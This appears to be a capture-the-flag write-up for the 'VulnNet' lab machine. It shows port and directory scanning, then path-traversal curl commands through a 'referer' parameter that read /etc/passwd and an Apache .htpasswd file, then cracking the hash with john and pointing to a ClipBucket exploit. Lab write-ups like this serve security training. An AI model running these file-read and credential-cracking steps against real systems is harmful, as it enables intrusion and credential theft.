VulnNet

Can you take advantage of the misconfigurations made by VulnNet Entertainment?

Enumeration

1) masscan: masscan -e eth0 -p 1-65535 --rate=10000 10.10.186.105

Discovered open port 22/tcp on 10.10.186.105                                   
Discovered open port 80/tcp on 10.10.186.105

2) nmap: nmap -sV -sC -p 22,80 -v 10.10.186.105

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ea:c9:e8:67:76:0a:3f:97:09:a7:d7:a6:63:ad:c1:2c (RSA)
|   256 0f:c8:f6:d3:8e:4c:ea:67:47:68:84:dc:1c:2b:2e:34 (ECDSA)
|_  256 05:53:99:fc:98:10:b5:c3:68:00:6c:29:41:da:a5:c9 (EdDSA)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 8B7969B10EDA5D739468F4D3F2296496
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: VulnNet

3) gobuster:

gobuster dir -u http://vulnnet.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Starting gobuster
===============================================================
/img (Status: 301)
/css (Status: 301)
/js (Status: 301)
/fonts (Status: 301)

4) found a login page :

5) nikto scan: nikto -h http://vulnnet.thm

+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ Server leaks inodes via ETags, header found with file /LICENSE.txt, fields: 0x455 0x5b995f090f3a1 
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.

6) LICENSE.txt shows zlib version. But this is not vulnerable

7) /js directory shows .js files

8) I need to use linkfinder

git clone [linkfinder]
pip3 install -r requirement.txt
Search link: ./linkfinder.py -i http://vulnnet.thm/js/index__d8338055.js -o cli

http://vulnnet.thm/index.php?referer=
http://broadcast.vulnnet.thm

9) I need to add http://broadcast.vulnnet.thm in /etc/hosts, then it shows:

10) There is LFI: curl http://vulnnet.thm/index.php?referer=..//..//..//..//..//..//etc/passwd

11) Searching for password in common file:

curl http://vulnnet.thm/index.php?referer=..//..//..//..//..//..//etc/apache2/.htpasswd

developers:$apr1$ntOz2ERF$..................

Exploitation:

12) Cracking hash: john hash --wordlist=/usr/share/wordlists/rockyou.txt

13) Using these credential, I can log in broadcast

14) Site running Clip Bucket 4.0. There is an exploit for this: Exploit DB

Previoustomghost NextEasy machines

Last updated 4 years ago

Was this helpful?